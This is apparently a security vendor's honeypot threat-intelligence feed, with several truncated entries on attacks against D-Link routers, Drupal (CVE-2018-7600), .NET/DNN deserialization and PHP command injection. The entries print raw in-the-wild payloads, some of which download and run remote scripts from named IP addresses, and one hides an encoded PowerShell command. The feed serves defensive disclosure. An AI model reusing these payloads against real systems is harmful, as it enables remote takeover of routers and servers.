D-Link Router Vulnerability

Date of Detection: 2018.5.24   Attack Pattern: URI:           /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ Malware: The malware is placed at this IP address: 185.62.190.191.   Target System: D-Link DSL-2750B   Analysis: Attackers first exploit vulnerable systems and then control them with malware. Failing to validate users’ inputs, the affected routers can be controlled by remote attackers, without credentials. Due[…]

Widespread Drupal Arbitrary Code Execution

Date of Detection: 2018.3.29   Attack Pattern: URI: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax   Request Body: form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec& mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php   Target System: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.   Analysis: This issue is not a zero-day vulnerability and assigned as CVE-2018-7600. However, attackers are scanning and[…]

Honeypot Extraction – Digital Currency Mining

Date of Detection: 2018.1.30   Description: Cryptocurrency mining becomes more and more popular. Attackers are widely exploiting victims’ systems to mine digital currencies and making profits. According to the news report on February 21st, 2018, even Tesla cloud resources are hacked to run cryptocurrency-mining malware. As CloudCoffer’s honeypots keep detecting this type of exploit and[…]

Honeypot Extraction -Windows .NET Framework

Date of Detection: 2017.12.11   Source IP Addresses: 173.212.217.181、149.255.35.91   Attack Raw Pattern: DNNPersonalization=<profile><item key=\”key\” type=\”System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\”><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\”ObjectStateFormatter\” xmlns:p3=\”http://www.w3.org/2001/XMLSchema-instance\” /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\”http://www.w3.org/2001/XMLSchema\” p5:type=\”q1:string\” xmlns:p5=\”http://www.w3.org/2001/XMLSchema-instance\”>/wEy8ykAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;   Target System: Windows with .NET Framework   Malicious File Path from the[…]

Honeypot Extraction -Command Injection

Date of Detection: 2017.11.20   Source IP Addresses: 27.255.77.103   Attack Raw Pattern: After decoding URL, the pattern is as follows. <? system(“cd /tmp ; wget http://175.126.167.52/apache.txt ; curl -O http://175.126.167.52/apache.txt ; fetch http://175.126.167.52/apache.txt ; chmod +x apache.txt ; perl apache.txt ; rm -rf apache.txt ; history -c “); ?> Malicious File Path from the[…]